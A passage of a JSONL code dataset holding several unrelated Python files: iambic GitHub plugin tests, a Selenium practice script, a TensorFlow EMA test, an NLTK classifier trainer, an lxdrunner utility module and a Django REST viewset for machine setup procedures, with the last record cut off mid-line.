merge_method=\"merge\")\n\n\ndef test_run_handler():\n from iambic.plugins.v0_1_0.github.github import run_handler\n\n mock_Github = MagicMock(name=\"Github\")\n with mock.patch(\n \"iambic.plugins.v0_1_0.github.github.github.Github\", new=mock_Github\n ):\n # mg.generate_uut_mocks_with_asserts(run_handler)\n arg = {\n \"token\": \"fake-token\",\n \"event_name\": \"pull_request\",\n \"iambic\": {\"GH_OVERRIDE_TOKEN\": \"GH_OVERRIDE_TOKEN\"},\n \"repository\": \"exampleorg/iambic-templates\",\n \"event\": {\"pull_request\": {\"number\": 4}},\n }\n run_handler(arg)\n assert 2 == mock_Github.call_count\n mock_Github.assert_has_calls(\n calls=[\n call(\"fake-token\"),\n call(\"GH_OVERRIDE_TOKEN\"),\n ]\n )\n mock_Github.return_value.get_repo.assert_called_once_with(\n \"exampleorg/iambic-templates\"\n )\n mock_Github.return_value.get_repo.return_value.get_pull.assert_called_once_with(\n 4\n )\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.create_issue_comment.assert_called_once_with(\n \"iambic git-plan\"\n )\n mock_Github.reset_mock()\n\n arg = {\n \"token\": \"fake-token\",\n \"event_name\": \"issue_comment\",\n \"iambic\": {\"GH_OVERRIDE_TOKEN\": \"GH_OVERRIDE_TOKEN\"},\n \"repository\": \"exampleorg/iambic-templates\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-apply\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\"number\": 4},\n \"repository\": {\n \"clone_url\": \"https://github.com/exampleorg/iambic-templates.git\"\n },\n },\n }\n run_handler(arg)\n assert 1 == mock_Github.call_count\n mock_Github.assert_called_once_with(\"fake-token\")\n mock_Github.return_value.get_repo.assert_called_once_with(\n \"exampleorg/iambic-templates\"\n )\n mock_Github.return_value.get_repo.return_value.get_pull.assert_called_once_with(\n 4\n )\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.mergeable_state.__ne__.assert_called_once_with(\n \"clean\"\n )\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.mergeable_state.__str__.assert_called_once_with()\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.create_issue_comment.assert_called_once()\n assert (\n \"This probably means that the necessary approvals have not been granted for the request.\"\n in mock_Github.return_value.get_repo.return_value.get_pull.return_value.create_issue_comment.call_args.args[\n 0\n ]\n )\n mock_Github.reset_mock()\n\n arg = {\n \"token\": \"fake-token\",\n \"event_name\": \"iambic_command\",\n \"iambic\": {\n \"GH_OVERRIDE_TOKEN\": \"GH_OVERRIDE_TOKEN\",\n \"IAMBIC_CLOUD_IMPORT_CMD\": \"import\",\n },\n \"repository\": \"exampleorg/iambic-templates\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-apply\",\n },\n \"issue\": {\"number\": 4},\n \"repository\": {\n \"clone_url\": \"https://github.com/exampleorg/iambic-templates.git\"\n },\n },\n }\n # TODO: Need to mock the paths\n with pytest.raises(Exception):\n run_handler(arg)\n\n\n@pytest.fixture\ndef mock_proposed_changes_filesystem():\n temp_templates_directory = tempfile.mkdtemp(\n prefix=\"iambic_test_temp_templates_directory\"\n )\n\n try:\n contents = \"\"\"hello world\"\"\"\n contents_path = f\"{temp_templates_directory}/proposed_changes.yaml\"\n\n with open(contents_path, \"w\") as f:\n f.write(contents)\n\n yield contents_path, contents\n finally:\n try:\n shutil.rmtree(temp_templates_directory)\n except Exception as e:\n print(e)\n\n\n# verify if there are changes during git_apply. those changes are push\n# back into the PR\ndef test_post_artifact_to_companion_repository(\n mock_github_client,\n mock_proposed_changes_filesystem,\n):\n contents_path, contents = mock_proposed_changes_filesystem\n markdown_summary = \"test_summary\"\n\n mock_template_repo = mock_github_client.get_repo.return_value\n\n # we are mocking how the sha has changed in the local checkout repo\n type(mock_template_repo).full_name = PropertyMock(\n side_effect=[\n \"ExampleOrg/iambic-templates\",\n ]\n )\n\n pull_number = \"1337\"\n op_name = \"plan\"\n html_url = _post_artifact_to_companion_repository(\n mock_github_client,\n mock_github_client.get_repo(\"ExampleOrg/iambic-templates\"),\n pull_number,\n op_name,\n contents_path,\n markdown_summary,\n default_base_name=\"proposed_changes.yaml\",\n write_summary=True,\n )\n\n mock_calls = mock_template_repo.create_file.call_args_list\n assert mock_calls\n\n # verify first call to upload proposed_changes.yaml\n proposed_changes_yaml_call = mock_calls[0]\n # index 1 is where the arguments are, next index 0 is the blob_path\n blob_path, commit_message, blob_contents = proposed_changes_yaml_call[0]\n assert f\"pr-{pull_number}\" in blob_path\n assert f\"{op_name}\" in blob_path\n assert \"proposed_changes.yaml\" in blob_path\n\n # index 1 is where the arguments are, next index 1 is the commit_message\n assert commit_message == f\"{op_name}\"\n\n # index 1 is where the arguments are, next index 2 is the blob_contents\n assert blob_contents == contents\n\n # verify second call to upload summary.md\n summary_md_call = mock_calls[1]\n # index 1 is where the arguments are, next index 0 is the blob_path\n blob_path, commit_message, blob_contents = summary_md_call[0]\n assert f\"pr-{pull_number}\" in blob_path\n assert f\"{op_name}\" in blob_path\n assert \"summary.md\" in blob_path\n\n # index 1 is where the arguments are, next index 1 is the commit_message\n assert commit_message == f\"{op_name}\"\n\n # index 1 is where the arguments are, next index 2 is the blob_contents\n assert blob_contents == markdown_summary\n\n assert html_url\n\n\ndef test_ensure_body_length_fits_github_spec():\n blob_html_url = \"https://fake-location/\"\n body = \"h\" * (BODY_MAX_LENGTH + 1)\n new_body = ensure_body_length_fits_github_spec(body, blob_html_url=blob_html_url)\n assert blob_html_url in new_body\n\n\ndef test_maybe_merge_crashes(\n mock_github_client,\n):\n def merge_error(*args, **kwargs):\n raise github.GithubException(409, \"409 unable to merge\", {})\n\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.merge.side_effect = merge_error\n templates_repo = mock_github_client.get_repo(\"ExampleOrg/iambic-templates\")\n pull_number = 1337\n merge_sha = \"non_existent_sha\"\n expected_attempts = 3\n with pytest.raises(RuntimeError, match=\"Fail to merge PR\"):\n maybe_merge(\n templates_repo,\n pull_number,\n merge_sha,\n max_attempts=expected_attempts,\n sleep_interval=0.1,\n )\n assert mock_pull_request.merge.called\n assert len(mock_pull_request.merge.mock_calls) == expected_attempts\n\n\ndef test_maybe_merge_does_not_crash(\n mock_github_client,\n):\n def merge_error(*args, **kwargs):\n return MagicMock()\n\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.merge.side_effect = merge_error\n templates_repo = mock_github_client.get_repo(\"ExampleOrg/iambic-templates\")\n pull_number = 1337\n merge_sha = \"non_existent_sha\"\n expected_attempts = 3\n maybe_merge(\n templates_repo,\n pull_number,\n merge_sha,\n max_attempts=expected_attempts,\n sleep_interval=0.1,\n )\n assert mock_pull_request.merge.called\n assert len(mock_pull_request.merge.mock_calls) == 1\n","repo_name":"noqdev/iambic","sub_path":"test/plugins/v0_1_0/github/test_github.py","file_name":"test_github.py","file_ext":"py","file_size_in_byte":25256,"program_lang":"python","lang":"en","doc_type":"code","stars":256,"dataset":"github-code","pt":"75"} +{"seq_id":"15600121634","text":"from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nservice_obj=Service(\"./chromedriver/chromedriver.exe\")\ndriver = webdriver.Chrome(service=service_obj)\ndriver.maximize_window()\n\ndriver.get(\"https://rahulshettyacademy.com/AutomationPractice/\")\naction = ActionChains(driver)\naction.click_and_hold(driver.find_element(By.ID,\"mousehover\")).perform()\n# action.context_click(driver.find_element(By.XPATH,\"//a[@href='#top']\")).perform()\n# action.double_click()\naction.move_to_element(driver.find_element(By.LINK_TEXT,\"Reload\")).perform()\naction.move_to_element(driver.find_element(By.LINK_TEXT,\"Top\")).perform()\ndriver.get_screenshot_as_file(\"lll.jpeg\")\n\ndriver.close()","repo_name":"laxman-jambagi/First_git_demo","sub_path":"Action_chains_class.py","file_name":"Action_chains_class.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29312644110","text":"import tensorflow as tf\n\nfrom tensorflow_graphics.projects.gan import exponential_moving_average\n\n\nclass ExponentialMovingAverageTest(tf.test.TestCase):\n\n def test_decay_one_values_are_from_initialization(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=1.0)\n initial_value = 2.0\n variable = tf.Variable(initial_value)\n\n ema.apply((variable,))\n variable.assign(3.0)\n ema.apply((variable,))\n\n self.assertAllClose(ema.averaged_variables[0], initial_value)\n\n def test_decay_zero_returns_last_value(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=0.0)\n final_value = 3.0\n variable = tf.Variable(2.0)\n\n ema.apply((variable,))\n variable.assign(final_value)\n ema.apply((variable,))\n\n self.assertAllClose(ema.averaged_variables[0], final_value)\n\n def test_cross_replica_context_raises_error(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=0.0)\n\n with self.assertRaisesRegex(\n NotImplementedError, 'Cross-replica context version not implemented.'):\n with tf.distribute.MirroredStrategy().scope():\n variable = tf.Variable(2.0)\n ema.apply((variable,))\n\n def test_mirrored_strategy_replica_context_runs(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=0.5)\n strategy = tf.distribute.MirroredStrategy()\n\n def apply_to_ema(variable):\n ema.apply((variable,))\n\n with strategy.scope():\n variable = tf.Variable(2.0)\n strategy.run(apply_to_ema, (variable,))\n\n self.assertAllClose(ema.averaged_variables[0], variable.read_value())\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"tensorflow/graphics","sub_path":"tensorflow_graphics/projects/gan/exponential_moving_average_test.py","file_name":"exponential_moving_average_test.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":2734,"dataset":"github-code","pt":"75"} +{"seq_id":"41854266160","text":"numbers = []\n\nwhile True:\n line = input(\"enter a number or Enter to finish: \")\n if line:\n try:\n number = int(line)\n except ValueError as err:\n print(err)\n continue\n numbers += [number]\n else:\n break\n\ncount = len(numbers)\n\nif count:\n total = sum(numbers)\n print(\"numbers:\", numbers)\n print(\"count =\", count, \"sum =\", total,\n \"lowest =\", min(numbers), \"highest =\", max(numbers),\n \"mean =\", total / count)\n","repo_name":"giocosmiano/programming-in-python-3","sub_path":"ch01-rapid-introduction/exercise_02.py","file_name":"exercise_02.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20395996202","text":"import nltk\nimport random\nimport pickle\nfrom nltk.corpus import movie_reviews\n\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB, BernoulliNB\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.svm import SVC, LinearSVC, NuSVC\n\nfrom nltk.tokenize import word_tokenize\n\nclass CategoryClassf(object):\n def __init__(self):\n self.acting = open(\"E:/CDAP/FlaskProject/TextFiles/Datasets/Categories/acting.txt\", \"r\").read()\n self.directing = open(\"E:/CDAP/FlaskProject/TextFiles/Datasets/Categories/directing.txt\", \"r\").read()\n self.storyline = open(\"E:/CDAP/FlaskProject/TextFiles/Datasets/Categories/story.txt\", \"r\").read()\n\n self.documents = []\n self.all_words = []\n\n self.loadDocument()\n\n\n self.all_words = nltk.FreqDist(self.all_words)\n\n word_features = list(self.all_words.keys())[:5000]\n\n def find_features(document):\n # words = set(document)\n words = word_tokenize(document)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n\n return features\n\n # print((find_features(movie_reviews.words('neg/cv000_29416.txt'))))\n featuresets = [(find_features(rev), category) for (rev, category) in self.documents]\n random.shuffle(featuresets)\n # posterior = prior occurences x liklihood / evidence\n\n # positive data example\n print(len(featuresets))\n\n self.training_set = featuresets[:900]\n self.testing_set = featuresets[900:]\n\n\n\n\n def loadDocument(self):\n for p in self.directing.split('\\n'):\n self.documents.append((p, \"directing\"))\n\n for p in self.storyline.split('\\n'):\n self.documents.append((p, \"storyline\"))\n\n for p in self.acting.split('\\n'):\n self.documents.append((p, \"acting\"))\n\n self.short_acting = word_tokenize(self.acting)\n self.short_directing = word_tokenize(self.directing)\n self.short_storyline = word_tokenize(self.storyline)\n\n for w in self.short_acting:\n self.all_words.append(w.lower())\n\n for w in self.short_directing:\n self.all_words.append(w.lower())\n\n for w in self.short_storyline:\n self.all_words.append(w.lower())\n\n\n def saveClassifiers(self):\n\n \"\"\"\n Saving classifiers with pickling\n :return: \n \"\"\"\n\n classifierFilePath = \"E:/CDAP/FlaskProject/SavedClassifiers/CategoryClassifiers/\"\n\n classifier = nltk.NaiveBayesClassifier.train(self.training_set)\n save_classifier = open( classifierFilePath + \"naivebayes.pickle\", \"wb\")\n pickle.dump(classifier, save_classifier)\n save_classifier.close()\n\n MNB_classifier = SklearnClassifier(MultinomialNB())\n MNB_classifier.train(self.training_set)\n save_MNBclassifier = open(classifierFilePath + \"MNB.pickle\", \"wb\")\n pickle.dump(MNB_classifier, save_MNBclassifier)\n save_MNBclassifier.close()\n\n BernoulliNB_classifier = SklearnClassifier(BernoulliNB())\n BernoulliNB_classifier.train(self.training_set)\n save_Bernouliclassifier = open(classifierFilePath + \"Bernouli.pickle\", \"wb\")\n pickle.dump(BernoulliNB_classifier, save_Bernouliclassifier)\n save_Bernouliclassifier.close()\n\n LogisticRegression_classifier = SklearnClassifier(LogisticRegression())\n LogisticRegression_classifier.train(self.training_set)\n save_LogisticRegression = open(classifierFilePath + \"Logistic.pickle\", \"wb\")\n pickle.dump(LogisticRegression_classifier, save_LogisticRegression)\n save_LogisticRegression.close()\n\n SGDClassifier_classifier = SklearnClassifier(SGDClassifier())\n SGDClassifier_classifier.train(self.training_set)\n save_SGDClassifier_classifier = open(classifierFilePath + \"SGD.pickle\", \"wb\")\n pickle.dump(SGDClassifier_classifier, save_SGDClassifier_classifier)\n save_SGDClassifier_classifier.close()\n\n SVC_classifier = SklearnClassifier(SVC())\n SVC_classifier.train(self.training_set)\n save_SVC_classifier = open(classifierFilePath + \"SVC.pickle\", \"wb\")\n pickle.dump(SVC_classifier, save_SVC_classifier)\n save_SVC_classifier.close()\n\n # LinearSVC_classifier = SklearnClassifier(LinearSVC())\n # LinearSVC_classifier.train(training_set)\n # save_LinearSVC_classifier = open(\"LinearSVC.pickle\" , \"wb\")\n # pickle.dump(LinearSVC_classifier , save_LinearSVC_classifier)\n # save_LinearSVC_classifier.close()\n #\n # NuSVC_classifier = SklearnClassifier(NuSVC())\n # NuSVC_classifier.train(training_set)\n # save_NuSVC_classifier = open(\"NuSVC.pickle\" , \"wb\")\n # pickle.dump(NuSVC_classifier , save_NuSVC_classifier)\n # save_NuSVC_classifier.close()\n\n\n\n","repo_name":"vishwnv/jAnalyzer","sub_path":"Scripts/CategoryClassifying/SaveCGClassifiers.py","file_name":"SaveCGClassifiers.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27980338149","text":"#!/usr/bin/env python3\n\nimport secrets\nimport threading\n\nfrom .appconf import config as cfg\n\n#\n# Helper Functions\n#\n\n\ndef has_prefix(name):\n \" Check if name is managed by LXDRunner \"\n return name.startswith(cfg.prefix + \"-\")\n\n\ndef make_name():\n \" Generate name based on prefix and random token \"\n return \"{}-{}\".format(cfg.prefix, secrets.token_hex(3))\n\n\ndef threadit(func, **kwargs):\n thread = threading.Thread(target=func, daemon=True, **kwargs)\n thread.start()\n return thread\n\n\ndef env_str(data):\n\n sdata = \"\"\n for key, val in data.items():\n sdata += f\"{key}={val}\\n\"\n return sdata\n\n\ndef image_to_source(image):\n \" Convert image resource [:] to source object \"\n alias = image\n source = dict(type=\"image\", mode=\"pull\")\n\n if \":\" in image:\n remote_name, alias = image.split(\":\", 1)\n remote = cfg.remotes.get(remote_name)\n source['protocol'] = remote.protocol\n source['server'] = remote.addr\n\n source['alias'] = alias\n return source\n","repo_name":"jonans/lxdrunner","sub_path":"lxdrunner/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"} +{"seq_id":"6999255514","text":"import sqlite3\nfrom datetime import datetime, timedelta\n\nfrom django.db.models import Count\nfrom django.db.models.query_utils import Q\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom accounts.models import User, Cargo\nfrom maquinas.models import Maquinas\nfrom setup.models import EtapaProcesso, Procedimento, OrdemProcesso, ProcedimentoPadrao\nfrom setup.serializers import (\n EtapaProcessoSerializer,\n # SetupSerializer,\n OrdemProcessoSerializer,\n ProcedimentoShortSerializer, ProcedimentoDetailsSerializer, ProcedimentoStatusSerializer,\n RelatorioPeriodoSerializar, ProcedimentoSerializer)\n\n\nclass OrdemProcessoViewSet(ModelViewSet):\n queryset = OrdemProcesso.objects.all()\n serializer_class = OrdemProcessoSerializer\n\n\nclass EtapaProcessoViewSet(ModelViewSet):\n queryset = EtapaProcesso.objects.all()\n serializer_class = EtapaProcessoSerializer\n\n def create(self, request, *args, **kwargs):\n # op etapa gerente maquina descrica status\n data = request.data\n op = self.request.data.get('op', None)\n gerente = self.request.data.get('gerente', None)\n maquina = self.request.data.get('maquina', None)\n nivel = self.request.data.get('nivel', None)\n\n try:\n etapa = EtapaProcesso(etapa=data['etapa'],\n descricao=data['descricao'],\n nivel=data['nivel'],\n linha=data['linha'],\n hora_programada = data['hora_programada'],\n quantidadeKit = data['quantidadeKit']\n )\n\n etapa.op = OrdemProcesso.objects.get(id=op)\n etapa.gerente = User.objects.get(id=gerente)\n etapa.maquina = Maquinas.objects.get(id=maquina)\n\n etapa.save()\n\n procedimentoPadrao = ProcedimentoPadrao.objects.filter(nivel=nivel)\n\n for padrao in procedimentoPadrao:\n\n procedimento = Procedimento(ordem_roteiro=padrao.ordem_roteiro, descricao=padrao.descricao,\n tempo_estimado=padrao.tempo_estimado, tipo=padrao.tipo)\n\n procedimento.setor = padrao.setor\n procedimento.operador = padrao.operador\n procedimento.tempo_estimado_ms = self.convert_date_ms(padrao.tempo_estimado)\n procedimento.processo = EtapaProcesso.objects.get(id=etapa.id)\n\n procedimento.save()\n\n return Response(status=status.HTTP_201_CREATED)\n except Exception as e:\n print (e)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n def convert_date_ms(self, date_string):\n\n date_time = datetime.strptime(date_string, '%H:%M:%S').time()\n\n t_hora_str = int(date_time.strftime('%H'))\n t_min_str = int(date_time.strftime('%M'))\n t_seg_str = int(date_time.strftime('%S'))\n\n total_ms = timedelta(hours=t_hora_str, minutes=t_min_str, seconds=t_seg_str).seconds * 1000\n return total_ms\n\n def update(self, request, *args, **kwargs):\n etapa = self.get_object()\n etapa.status = request.data.get('status', etapa.status)\n etapa.descricao = request.data.get('descricao', etapa.descricao)\n etapa.etapa = request.data.get('etapa', etapa.etapa)\n etapa.nivel = request.data.get('nivel', etapa.nivel)\n try:\n gerente = request.data.get('gerente', None)\n maquina = request.data.get('maquina', None)\n etapa = request.data.get('nivel', None)\n etapa.gerente = User.objects.get(id=gerente)\n etapa.maquina = Maquinas.objects.get(id=maquina)\n etapa.save()\n return Response(status=status.HTTP_200_OK)\n except Exception as e:\n return Response({'message': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n # Lista todos os processos (etapas) associadas a uma OP\n # url etapa-processo/{op_id}/listar_por_op/\n @action(methods=['get'], detail=True)\n def listar_por_op(self, request, pk):\n queryset = EtapaProcesso.objects.filter(op=pk)\n serializer = EtapaProcessoSerializer(queryset, many=True)\n return Response(serializer.data)\n\n @action(methods=['get'], detail=False)\n def etapa_ativos(self, request):\n etapas = EtapaProcesso.objects.filter(status=1)\n serializer = EtapaProcessoSerializer(etapas, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n\nclass CriarProcedimento(APIView):\n\n def post(self, request, format=None):\n print (request.data)\n\n file_serializer = ProcedimentoSerializer(data=request.data)\n\n if file_serializer.is_valid():\n\n objeto = file_serializer.save()\n\n porque_serializer = ProcedimentoSerializer(objeto)\n\n return Response(porque_serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProcedimentoViewSet(ModelViewSet):\n serializer_class = ProcedimentoShortSerializer\n\n def get_queryset(self):\n processo_id = self.request.query_params.get('processo_id', None)\n setor_id = self.request.data.get('setor_id', None)\n setor_nome = self.request.data.get('setor_nome', None)\n\n queryset = Procedimento.objects.all()\n\n if setor_id or setor_nome:\n queryset = queryset.filter(setor=setor_id) | queryset.filter(setor__descricao=setor_nome)\n if processo_id:\n queryset = queryset.filter(processo=processo_id)\n\n return queryset\n\n def create(self, request, *args, **kwargs):\n data = request.data\n\n try:\n procedimento = Procedimento(ordem_roteiro=data['ordem_roteiro'],\n descricao=data['descricao'],\n tempo_estimado=data['tempo_estimado'],\n tipo=data['tipo'])\n\n operador = User.objects.get(id=data['operador'])\n procedimento.operador = operador\n # setor_desc = data.get('setor', None)\n # procedimento.setor = setor[0] # Cargo.objects.get(id=data['setor'])\n\n # procedimento.setor = Cargo.objects.filter(descricao=data['setor'])\n\n predecessor = self.request.data.get('predecessor', None)\n\n if predecessor:\n procedimento.predecessor = Procedimento.objects.get(id=predecessor)\n\n procedimento.processo = EtapaProcesso.objects.get(id=data['processo'])\n procedimento.tempo_estimado_ms = self.convert_date_ms(procedimento.tempo_estimado)\n\n try:\n procedimento.save()\n except Exception as e:\n print (e)\n print(\"Procedimento salvo\")\n serializer = ProcedimentoShortSerializer(procedimento)\n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except Exception as e:\n print(e)\n return Response({'message': e}, status=status.HTTP_400_BAD_REQUEST)\n\n def retrieve(self, request, *args, **kwargs):\n print(\"Retrieve\")\n procedimento = self.get_object()\n serializer = ProcedimentoDetailsSerializer(procedimento)\n return Response(serializer.data)\n\n def update(self, request, *args, **kwargs):\n print(\"Update\")\n return super(ProcedimentoViewSet, self).update(request, *args, **kwargs)\n\n # Usar o metodo HTTP PATCH no front-end\n def partial_update(self, request, *args, **kwargs):\n print(\"Parcial Update\")\n procedimento = self.get_object()\n\n # TODO Nesse trecho podem ser colocados os campos a serem atualizados quando for necessário\n procedimento.descricao = request.data.get('descricao', procedimento.descricao)\n procedimento.tempo_estimado = request.data.get('tempo_estimado', procedimento.tempo_estimado)\n procedimento.status = request.data.get('status', procedimento.status)\n\n try:\n operador = request.data.get('operador', None)\n if operador:\n operador_id = User.objects.get(id=operador)\n procedimento.operador = operador_id\n except Exception as e:\n return Response({'message': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n procedimento.save()\n serializer = ProcedimentoShortSerializer(procedimento)\n return Response(serializer.data)\n\n # Verifica qual o status da atividade anterior a atual.\n @action(methods=['get'], detail=True)\n def verify_status_pre(self, request):\n if self.get_object().predecessor is not None:\n predecessorId = self.get_object().predecessor.id\n predecessor = Procedimento.objects.get(id=predecessorId)\n else:\n return Response('the object has no predecessor', status=status.HTTP_404_NOT_FOUND)\n\n serializer = ProcedimentoStatusSerializer(predecessor)\n\n if predecessor.status is not None:\n if predecessor.status >= 3:\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.data, status=status.HTTP_406_NOT_ACCEPTABLE)\n else:\n return Response('The status field is empty', status=status.HTTP_404_NOT_FOUND)\n\n @action(methods=['post'], detail=True)\n def iniciar_procedimento(self, request, pk):\n procedimento = self.get_object()\n operador = request.data.get('operador', None)\n hora_inicio = request.data.get('hora_inicio', None)\n\n if not hora_inicio:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n try:\n procedimento.hora_inicio = hora_inicio\n operador_id = User.objects.get(id=operador)\n procedimento.operador = operador_id\n procedimento.status = 2 # status = Realizando\n procedimento.save()\n return Response(status=status.HTTP_200_OK)\n except Exception as e:\n print(e.args[0])\n return Response({'mensage': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['POST'], detail=True)\n def finalizar_procedimento(self, request, pk):\n procedimento = self.get_object()\n\n procedimento.hora_fim = request.data.get('hora_fim', None)\n procedimento.montador = request.data.get('montador', None)\n procedimento.status = 3\n\n try:\n inicio = procedimento.hora_inicio.strftime(\"%Y-%m-%d %H:%M:%S\")\n data_inicio = datetime.strptime(inicio, \"%Y-%m-%d %H:%M:%S\")\n data_fim = datetime.strptime(procedimento.hora_fim, \"%Y-%m-%d %H:%M:%S\")\n result = (data_fim - data_inicio).seconds\n\n procedimento.tempo_realizado_ms = str(result * 1000)\n procedimento.tempo_realizado = self.convert_ms_date_mask(procedimento.tempo_realizado_ms)\n procedimento.save()\n serializer = ProcedimentoDetailsSerializer(procedimento)\n\n self.verificar_procedimento(procedimento)\n return Response(serializer.data, status=status.HTTP_200_OK)\n except Exception as e:\n msg = e.args[0]\n print(msg)\n return Response({'mensage': msg}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['POST'], detail=True)\n def finalizar_com_justificativa(self, request, pk):\n procedimento = self.get_object()\n\n procedimento.hora_fim = request.data.get('hora_fim', None)\n procedimento.status = request.data.get('status', None)\n procedimento.observacao = request.data.get('observacao', None)\n procedimento.montador = request.data.get('montador', None)\n\n try:\n if procedimento.status == '4':\n inicio = procedimento.hora_inicio.strftime(\"%Y-%m-%d %H:%M:%S\")\n data_inicio = datetime.strptime(inicio, \"%Y-%m-%d %H:%M:%S\")\n data_fim = datetime.strptime(procedimento.hora_fim, \"%Y-%m-%d %H:%M:%S\")\n result = (data_fim - data_inicio).seconds\n\n procedimento.tempo_realizado_ms = str(result * 1000)\n procedimento.tempo_realizado = self.convert_ms_date_mask(procedimento.tempo_realizado_ms)\n\n # now = datetime.now()\n # procedimento.hora_inicio = now\n\n procedimento.save()\n serializer = ProcedimentoDetailsSerializer(procedimento)\n\n self.verificar_procedimento(procedimento)\n return Response(serializer.data, status=status.HTTP_200_OK)\n except Exception as e:\n msg = e.args[0]\n print('msg de erro ', msg)\n return Response({'mensage': msg}, status=status.HTTP_400_BAD_REQUEST)\n\n def verificar_procedimento(self, procedimento):\n pro = Procedimento.objects.filter(status=1) | Procedimento.objects.filter(status=2)\n # Se retornar vazio, nao existem atividades pendentes\n # # logo, o status do processo deve ser alterado para \"finalizado\"\n if not pro:\n processo_id = procedimento.processo.id\n etapa = EtapaProcesso.objects.get(id=processo_id)\n etapa.status = 2\n etapa.save()\n\n # TODO mudar este método usando o query_params.get()\n # procedimento/{id}/listar_procedimento/\n # procedimento/listar_procedimento/?processo_id={?}\n @action(methods=['get'], detail=True)\n def listar_procedimentos(self, request, pk):\n\n queryset = Procedimento.objects.filter(processo=pk)\n\n try:\n if not queryset:\n return Response(status=status.HTTP_404_NOT_FOUND)\n else:\n\n externo = queryset.filter(tipo=1).order_by('ordem_roteiro')\n interno = queryset.filter(tipo=2).order_by('ordem_roteiro')\n\n serializer1 = ProcedimentoShortSerializer(externo, many=True)\n serializer2 = ProcedimentoShortSerializer(interno, many=True)\n\n data = {\n 'setup_externo': serializer1.data,\n 'setup_interno': serializer2.data\n }\n return Response(data, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({'error': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['get'], detail=False)\n def listar_etapa_cargo(self, request):\n op = self.request.query_params.get('op', None)\n setor = self.request.query_params.get('setor', None)\n\n try:\n operador = User.objects.get(id=setor)\n procedimento = Procedimento.objects.filter(status=1) | Procedimento.objects.filter(status=2)\n\n procedimento = procedimento.values(\n 'processo__id',\n 'processo__descricao',\n 'processo__maquina__descricao',\n 'processo__op__descricao',\n 'processo__etapa',\n 'processo__hora_inicio',\n 'processo__gerente__name',\n ).annotate(qtde_atividades=Count('setor')).filter(\n operador=operador\n )\n if op:\n procedimento = procedimento.filter(processo__op=op)\n\n if not procedimento:\n return Response({'message': 'List is empty or null'}, status=status.HTTP_404_NOT_FOUND)\n\n return Response({'etapa_processo': procedimento}, status=status.HTTP_200_OK)\n except Exception as e:\n mensagem = {'error': e}\n return Response(mensagem, status=404)\n\n @action(methods=['get'], detail=False)\n def verificar_procedimento_aberto(self, request):\n user = self.request.query_params.get('operador', None)\n\n try:\n criterion1 = Q(status=1)\n criterion2 = Q(status=2)\n procedimento = Procedimento.objects.filter(operador=user)\n if not procedimento: # Verifica se a lista for zero, vazio ou false\n return Response({'menssage': 'Empty List'}, status=status.HTTP_404_NOT_FOUND)\n\n serializer = ProcedimentoDetailsSerializer(procedimento, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n except Exception as e:\n return Response({'menssage': e.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n @action(methods=['post'], detail=False)\n def reutilizar_setup(self, request):\n etapa_id = request.data.get('etapa_id', None)\n\n procedimentos = Procedimento.objects.filter(processo__id=int(etapa_id))\n etapa = procedimentos[0].processo\n\n obj_etapa = EtapaProcesso.objects.create(\n op=etapa.op, maquina=etapa.maquina,\n descricao=etapa.descricao\n )\n query_list = list()\n for pro in procedimentos:\n obj = Procedimento.objects.create(\n ordem_roteiro=pro.ordem_roteiro, descricao=pro.descricao,\n setor=pro.setor, tempo_estimado=pro.tempo_estimado,\n tempo_estimado_ms=pro.tempo_estimado_ms, status=1,\n processo=obj_etapa, tipo=pro.tipo\n )\n query_list.append(obj)\n\n serializer = 